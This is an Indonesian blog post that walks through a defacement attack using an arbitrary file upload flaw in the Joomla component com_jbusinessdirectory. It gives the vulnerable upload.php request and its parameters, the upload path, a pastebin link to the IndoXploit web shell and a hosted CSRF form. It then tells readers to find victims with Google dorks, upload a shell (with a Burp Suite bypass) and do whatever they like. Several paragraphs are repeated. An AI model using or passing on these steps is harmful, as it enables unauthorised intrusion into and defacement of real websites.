Exploit com_jbusinessdirectory Arbitrary File Upload (Indonesia Code Party)
Baiklah kembali lagi dengan saya Mr.Adewa
Pada kali ini saya akan memberikan Tutorial Deface Exploit com_jbusinessdirectory Arbitrary File Upload (Indonesia Code Party)
Pada kali ini saya akan memberikan Tutorial Deface Exploit com_jbusinessdirectory Arbitrary File Upload (Indonesia Code Party)
Sebelum itu kita harus mempersiapkan sesuatu
-Dork
Gunakan shel IndoXploit saja
CSRF ONLINE
/components/com_jbusinessdirectory/assets/upload.php?_root_app=/home/user/public_html/media/com_jbusinessdirectory/pictures&_target=/reviews/0/
postfile:
file
path upload:
/media/com_jbusinessdirectory/pictures/reviews/0/
catatan:
untuk root path nya harus tepat (misal : /home/icp/public_html/) dan folder target bisa di ubah sesuka hati
contoh :
icpdotcom/components/com_jbusinessdirectory/assets/upload.php?_root_app=/home/icp/public_html/images&_target=/nitip/
nanti filenya ada di icpdotcom/images/nitip/file (kadang filenya g keupload,jadi pinter" aja mainin path nya)
-Dork
USE YOUR BRAIN (mimin lagi malas mikir), maklum lagi banyak kerjaan-Shel
Gunakan shel IndoXploit saja
https://pastebin.com/raw/fnXXcFC2Catatan menurut Pemilik Exploit (Menggunakan CSRF)
CSRF ONLINE
http://bali.co.nz/csrf.phpexploit:
/components/com_jbusinessdirectory/assets/upload.php?_root_app=/home/user/public_html/media/com_jbusinessdirectory/pictures&_target=/reviews/0/
postfile:
file
path upload:
/media/com_jbusinessdirectory/pictures/reviews/0/
catatan:
untuk root path nya harus tepat (misal : /home/icp/public_html/) dan folder target bisa di ubah sesuka hati
contoh :
icpdotcom/components/com_jbusinessdirectory/assets/upload.php?_root_app=/home/icp/public_html/images&_target=/nitip/
nanti filenya ada di icpdotcom/images/nitip/file (kadang filenya g keupload,jadi pinter" aja mainin path nya)
1. Dorking dulu di google, di sini saya menggunakan versi saya sendiri, jadi dorking aja uploader. Jika menemukan comment
Akan ada add preview seperti ini
2. Upload shel kalian, jika tidak bisa di upload (Bypass menggunakan Burp Suite)
3. Di sini saya menggunakan Uploader Homeroot, jadi saya akan up uploader
4. Setelah itu kita upload shel masing-masing
Selanjutnya seterah kalian mau ngapain
Mungkin itulah sedikit penjelasan mengenai "Exploit com_jbusinessdirectory Arbitrary File Upload (Indonesia Code Party)"
Jika kurang paham kalian bisa bertanya di bawah ini
Jika kurang paham nonton aja video di bawah ini
Sekian dan Terimakasih
Segala sesuatu di tanggung sendiri, blog ini di buat untuk belajar bersama
Wassalamualaikum Wr.Wb
Jika kurang paham kalian bisa bertanya di bawah ini
Jika kurang paham nonton aja video di bawah ini
Sekian dan Terimakasih
Segala sesuatu di tanggung sendiri, blog ini di buat untuk belajar bersama
Wassalamualaikum Wr.Wb